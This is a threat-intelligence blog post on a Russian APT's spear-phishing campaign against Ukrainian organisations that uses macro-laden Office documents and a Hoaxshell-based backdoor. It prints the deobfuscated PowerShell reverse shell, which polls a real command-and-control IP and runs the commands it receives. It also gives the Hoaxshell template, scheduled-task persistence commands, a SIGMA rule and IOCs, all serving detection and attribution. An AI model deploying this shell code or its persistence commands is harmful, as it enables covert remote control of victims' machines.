Russian APT “Gamaredon” Exploits Hoaxshell to Target Ukrainian Organizations

Research by Gianluca Tiepolo and Rémi Arsene

An evil APT, as imagined by DALL·E

• Gamaredon is a Russian state-sponsored cyber espionage group that has been active since 2013. Over the years, Gamaredon’s main target has always been Ukrainian government organizations
• In January 2023, the BlackBerry Research and Intelligence Team outlined a campaign which relied on Telegram for malicious network structure purposes
• This analysis uncovers Gamaredon’s latest campaign, which targeted Ukrainian organizations by deploying Hoaxshell, a heavily obfuscated backdoor written in PowerShell

Gamaredon is a Russian state-sponsored hacking group that has been active since at least 2013. The group is believed to be responsible for a number of cyber attacks against Ukrainian targets, including military, government, and critical infrastructure organizations. The Security Service of Ukraine classifies the group as an APT (Advanced Persistent Threat), and unambiguously identifies it as a specially created structural unit of the Federal Security Service (FSB) of the Russian Federation, whose tasks are intelligence and subversive activities against Ukraine in cyberspace.

Gamaredon is also known as Primitive Bear (CrowdStrike), Winterflouder (iDefence), BlueAlpha (Recorded Future), BlueOtso (PWC), IronTiden (SecureWorks), SectorC08 (Red Alert), Callisto (NATO Association of Canada), Shuckworm and Armageddon (CERT-UA).

The group’s tactics, techniques, and procedures (TTPs) have been well documented and often involve the use of social engineering, spear-phishing, and malware, including backdoors and information stealers. The ultimate goal of the group is thought to be to gather intelligence and disrupt Ukrainian operations.

Following is a list of successful attacks attributed to the Gamaredon group over the years:

• Ukrainian Military Intrusions: In 2014, the group was found to have compromised several Ukrainian military units, allowing them to steal sensitive information and disrupt operations.
• Ukrainian Parliament Hack: In 2014, Gamaredon compromised the computer systems of the Ukrainian parliament, the Verkhovna Rada, and stole sensitive information.
• Ukrainian Power Grid Attack: In December 2015, Gamaredon was believed to have provided support to “Sandworm” in a successful attack on Ukraine’s power grid that resulted in a blackout affecting 225,000 customers.
• Kyiv Metro Hack: In 2016, the group was reported to have hacked into the computer systems of the Kyiv Metro, Ukraine’s capital city’s metro system, and stolen sensitive information.
• Pterodo Malware: In 2018, the Computer Emergency Response Team of Ukraine (CERT-UA) and the Foreign Intelligence Service of Ukraine detected a new strain of the “Pterodo” backdoor targeting computers at Ukrainian government agencies. The attack was attributed to Gamaredon.
• Covid-19 EU Campaign: In 2019, the group used the coronavirus pandemic as a topic to lure victims into opening emails and attachments. These campaigns targeted victims in European countries and others.
• Ukrainian Military Intrusions: According to SentinelLabs’ research and telemetry from victims of the APT group Gamaredon, the group has impacted a significant number of victims across the Ukrainian separatist line, affecting over 5,000 unique entities in Ukraine in 2020 alone.

In January 2023, the Russia-linked group is continuing to conduct offensive attacks against targets in Ukraine, as documented by Symantec, BlackBerry Research and Trellix. Over the course of recent weeks, I have found evidence of a previously unknown campaign by Gamaredon which targeted a number of organizations in the country.

The campaign, part of an ongoing espionage operation observed as recently as February 2023, aims to deliver malware to Ukrainian victim machines and makes heavy use of obfuscated PowerShell and VBScript (VBS) scripts as part of the infection chain. The malware is a WebShell that includes capabilities for executing remote commands from an attacker and deploying additional binary and script-based payloads on an infected machine.

Initial Access

The attack vector consists of a spear-phishing email with minimal body content along with an attachment. Once the attachment is opened by the victim, the system will be compromised through the installation of a WebShell. Like in their prior operations, Gamaredon relies on the highly targeted distribution of weaponized documents. Their deceptive lures imitate official documents from real Ukrainian government organizations, meticulously crafted to deceive individuals who have legitimate reasons to interact with those organizations.

Several types of attachments were used to deliver malware. Some examples include .xlsx, .doc, .xlsm and .docm, of which .docm was the most prevalent. The text of one such decoy document is pictured below.

Malicious lure document written in the Ukrainian language

As an example, the document with the filename “defiant.docm” employs a macro in order to gain initial access. Once the malicious document is opened, it executes the next stage of the attack chain.

The naming convention of the malicious documents in this campaign follows a similar pattern:

• defiant.doc
• defiant.docm
• derivant.xls
• derivant.xlsm

This is consistent with other campaigns by Gamaredon, where malicious files are made up of a word beginning with the letter “d” and a few are composed of two words separated by a “-”.

Execution

Once opened, the Word document will execute a heavily obfuscated macro called “xdm”. This PowerShell script decodes and executes a second PowerShell script (also obfuscated), which reports back to the command and control server.

The malicious ‘xdm’ macro

This script (which is the actual WebShell) also allows the remote server to send a PowerShell command to be executed locally.

The first layer of obfuscation is achieved by reversing the Base64-encoded payload.

The 1st layer of obfuscation

Once the first payload has been decoded, the malware reveals a second layer of obfuscation which is achieved through a number of techniques, such as string encoding, command and argument obfuscation, variable renaming and code packing.

The 2nd layer of obfuscation

Applying multiple obfuscation techniques can help threat actors evade signature-based detection systems, which rely on identifying specific patterns of code that are associated with known malicious activities. Once the second layer of obfuscation has been defeated, the code begins to be a lot more readable.

The 3rd layer of obfuscation

After a bit of cleaning and parsing, I obtained the following payload:

powershell -command Start-Process $PSHOME\powershell.exe
-ArgumentList {$s='141.8.197.42:4000';$i='17e9c023-7c9d6f61-48eb357e';
$p='http://';
$v=Invoke-RestMethod -UseBasicParsing -Uri
$p$s/17e9c023/$env:COMPUTERNAME/$env:USERNAME
-Headers @{"Authorization"=$i};
for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/7c9d6f61
-Headers @{"Authorization"=$i});
if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop
-ErrorVariable e;
$r=Out-String -InputObject $r;
$x=Invoke-RestMethod -Uri $p$s/48eb357e -Method POST
-Headers @{"Authorization"=$i}
-Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')}
sleep 0.8}}
-WindowStyle Hidden

The malicious payload creates a number of variables by performing string operations and replacements on several hardcoded strings. The resulting values are then used in several Invoke-WebRequest commands to make HTTP requests to the C&C server specified by the variables.

Let’s go through the code step-by-step. The script starts by defining three variables:

• $s which holds the address and port of the remote server 141[.]8[.]197[.]42:4000.
• $i which holds an authorization string 17e9c023-7c9d6f61-48eb357e.
• $p which holds the URL scheme http://.

Next, the script invokes a REST method using Invoke-RestMethod with the URL $p$s/17e9c023/$env:COMPUTERNAME/$env:USERNAME and an HTTP header containing the authorization string $i. The result of this method is stored in the $v variable.

The script then enters a loop that runs indefinitely. In each iteration, the script invokes another REST method using Invoke-RestMethod with the URL $p$s/7c9d6f61 and an HTTP header containing the authorization string $i. The result of this method (which is the command received from the C&C server) is stored in the $c variable.

The server response is then parsed to see if there are commands to be executed: if $c is not equal to the string "None", there is a new command from the C&C server, so the script uses Invoke-Expression to run the content of $c as a PowerShell command and stores the output in the $r variable. The script then invokes another REST method using Invoke-RestMethod with the URL $p$s/48eb357e, an HTTP header containing the authorization string $i, and a body containing the output of the previous command concatenated with the contents of the $e variable (which holds any error messages generated by the Invoke-Expression command).

Finally, the script uses the Sleep cmdlet to wait for 0.8 seconds before repeating the loop.

The script is executed using the powershell executable with the -command option and an -ArgumentList parameter that contains the script in a PowerShell script block. The -WindowStyle option is set to Hidden, which means that the PowerShell window will run in the background without being displayed.

This is not the only sample I came across: in a variant of the infected Word document, the address of the command and control server was requested from a hardcoded Telegram account, with each account periodically deploying new IP addresses. Once the IP address is obtained, it is used to assemble the previously analyzed payload.

Fetching IP addresses from Telegram accounts is a technique that has been associated to Gamaredon group in a number of campaigns, including latest research by BlackBerry. However, the thing that really caught my attention was the PowerShell payload: it was intriguing to find out that it contains an authorization string (such as 17e9c023-7c9d6f61-48eb357e) which is passed to the C&C through a header and this string is different for each target. This suggests that Gamaredon is attacking its victims through some highly targeted attacks.

The other thing I noticed in Gamaredon’s payload is a great similarity with the following code:

$s='*SERVERIP*';
$i='*SESSIONID*';
$p='http://';
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/*VERIFY*
-Headers @{"*HOAXID*"=$i};
while ($true){
$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/*GETCMD*
-Headers @{"*HOAXID*"=$i}).Content;
if ($c -ne 'None') {
$r=iex $c -ErrorAction Stop -ErrorVariable e;
$r=Out-String -InputObject $r;
$t=Invoke-WebRequest -Uri $p$s/*POSTRES* -Method POST
-Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r)
-join ' ')}
sleep *FREQ*}

This code is a payload template from Hoaxshell.

Hoaxshell

Hoaxshell is an open-source reverse shell for Windows created by security researcher Panagiotis Chartas. The project abuses the HTTP protocol to create a beacon-like connection to the C&C through repeated GET requests, promoting the illusion of having an actual shell.

Hoaxshell Project by Panagiotis Chartas

The main file used to generate the payload is written in Python, while the WebShell’s actual code is pure PowerShell.

One of the reasons why the project gained traction is that it includes built-in obfuscation techniques and it performs so well against systems running AV solutions, without being detected.

Hoaxshell’s obfuscated payload is currently undetected by major AV solutions

This is probably the reason why Gamaredon group abused the project in this campaign; in fact, the Word document with the malicious payload based on Hoaxshell (with a few tweaks added by Gamaredon) was able to completely bypass some of the most popular AV solutions, including Microsoft Defender, Kaspersky, McAfee and SentinelOne.

The fact that Gamaredon exploited an open-source project like Hoaxshell doesn’t exactly come as a surprise: the group has been observed using widely-available tools such as the Remote Access Trojan (RAT) called “njRAT”, the remote desktop tool “UltraVNC” and the network scanner “Masscan”. These off-the-shelf tools provide the group with basic functionality, such as the ability to remotely control compromised systems or scan for vulnerable targets.

In addition to off-the-shelf tools, the group is also known to develop custom tools and malware to carry out specific attacks. For example, the group has been observed using custom-developed backdoors, such as “Pterodo” and “BlackEnergy”, to gain access to target systems and to maintain persistence within a network.

The use of both off-the-shelf and custom-developed tools allows the Gamaredon group to carry out effective and efficient attacks, while also making it harder for defenders to detect and respond to their activity.

In this particular campaign, once Gamaredon gained an initial foothold through the malicious Word document, the group was observed running reconnaissance commands and deploying the “Pterodo” backdoor to maintain persistence.

Gamaredon’s post exploitation activity

Once the group obtained persistence on the target, the attackers proceed to download another variant of their “Pterodo” backdoor and begin running additional scripts and creating scheduled tasks to run every few minutes.

schtasks.exe /CREATE /sc minute /mo 12 /tn "BackgroundConfig" /tr "depended.exe" mediatv.mov //e:VBScript //b /F
schtasks.exe /CREATE /sc minute /mo 12 /tn "VideoHostName" /tr "wscript.exe" videotv.m3u //e:VBScript //b /F

Later, a new file called deerskin.exe was downloaded by exploiting the Hoaxshell shell: when executed, it checks internet connectivity, then proceeds to drop a VNC client (UltraVNC) and establishes a connection to Gamaredon’s remote C&C server.

Detection

The analysis of this campaign has revealed a number of patterns which can be useful for detection opportunities:

• Most URLs and IPs related to the group are related to AS9123 TimeWeb Ltd. (Russia);
• Most URLs used for Gamaredon’s C&C servers are subdomains of xsph[.]ru;
• Almost all malicious files are made up of words beginning with the letter “d”;

For detection purposes, I have written a simple SIGMA rule which matches Gamaredon’s malicious payload.

title: Possible Gamaredon Exploitation through Hoaxshell
id: 5c6f0a85-ddae-45af-b382-9102c7c8efd2
status: experimental
description: Detects a suspicious child process spawning from Word associated with Gamaredon's Hoaxshell campaign.
references:
- https://mrtiepolo.medium.com/
author: Gianluca Tiepolo
date: 2023/02/14
tags:
- attack.execution
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    - ParentImage|endswith: \winword.exe
    - CommandLine|contains|all:
            - 'powershell.exe'
            - 'UseBasicParsing'
            - 'Authorization'
            - 'InputObject'
            - 'System.Text.Encoding'
            - 'http://'
            - 'comptername/$env'
  condition: all of selection
falsepositives:
- Unknown
level: high

Infrastructure and Attribution

Gamaredon has been changing infrastructure over time; however, it’s worth noting that the tools used by the group, while not particularly sophisticated in terms of architecture and implementation complexity, have still been highly effective in carrying out their criminal activities. It’s also worth mentioning that the group has not shown much interest in lateral movement within the network, instead relying on their tactics, techniques, and procedures (TTPs) to compromise a large number of individual user systems through targeted delivery of malware.

As previously mentioned, Gamaredon employs open-source tools to distribute their malware, which are typically delivered through spear-phishing emails. When the victim receives the malicious email, they are sent an attachment in Word or Excel format, which contains the malware. At the final stage of the attack, the group deploys remote access software and information-gathering tools.

The Gamaredon group exclusively used Russian telecommunication providers to deploy their command and control servers in this campaign, with most of them being provided by IP Server LLC, Hosting technology LTD, TimeWeb LLC, and SprintHost LLC.RU.

Attribution of Gamaredon to this campaign was possible by matching known TTPs and infrastructure analysis. A full list of IOCs is provided below.

Conclusions

Despite being publicly exposed multiple times, the Gamaredon group persists in utilizing the same simplistic techniques, often relying on readily available tools (such as Hoaxshell) and heavy obfuscation, and even reusing code in new attacks.

Despite this, the group has achieved notable success in their operations and continues to pose a significant cyber threat to Ukraine. The group’s attack chain is characterized by the widespread use of weaponized Office documents, Office template injection, WMI, and dynamic VBA macro stages, making it highly malleable and adaptable.

Given the group’s specific focus on Ukrainian organizations and the current geopolitical climate, it’s highly likely that Gamaredon will continue to target this region.

IOCs

Following is a list of indicators associated to this campaign.

Domains
hxxp://f0559838[.]xsph[.]ru
hxxp://a0728173[.]xsph[.]ru

IPs
141[.]8[.]197[.]42
141[.]8[.]192[.]151

SHA256
2AD5A546EAE0FEABADD0D4416EB03CBDA697A25A1F9528C0DCE46CEFA4DC550A (defiant.docm)
0724A8DB352E34FC2597974099BF0376D0D31780C0B02E1EDB2BCB5905D852DC (defiant.docm variant)
D9C89BF2575CEB88BB395FC1E77895A95FE600856A8B0D5EADCD47CF8D066C41 (defiant.docm variant)

TTPs
T1566 — Initial Access > Spearphishing Attachment
T1059 — Execution > PowerShell
T1053 — Execution > Scheduled Tasks
T1027 — Defense Evasion > Obfuscated Files or Information
T1082 — Discovery > System Information Discovery
T1219 — Command & Control > Remote Access Tools

About the Author — Gianluca Tiepolo

I’m a cybersecurity researcher who specializes in digital forensics and incident response for the telecommunications industry. Over the past 12 years, by working as a consultant I have performed forensic analysis, threat hunting, incident response, and Cyber Threat Intelligence analysis for dozens of organizations, including several Fortune® 100 companies. In 2013, I co-founded the startup Sixth Sense Solutions, which developed AI-based antifraud solutions.

Today, I work as a Cyber Threat Intelligence (CTI) Team Lead for Accenture Security.

I love writing and sharing my knowledge: in 2016 I authored the book “Getting Started with RethinkDB”, and in 2022 I wrote “iOS Forensics for Investigators”, both published by Packt Publishing.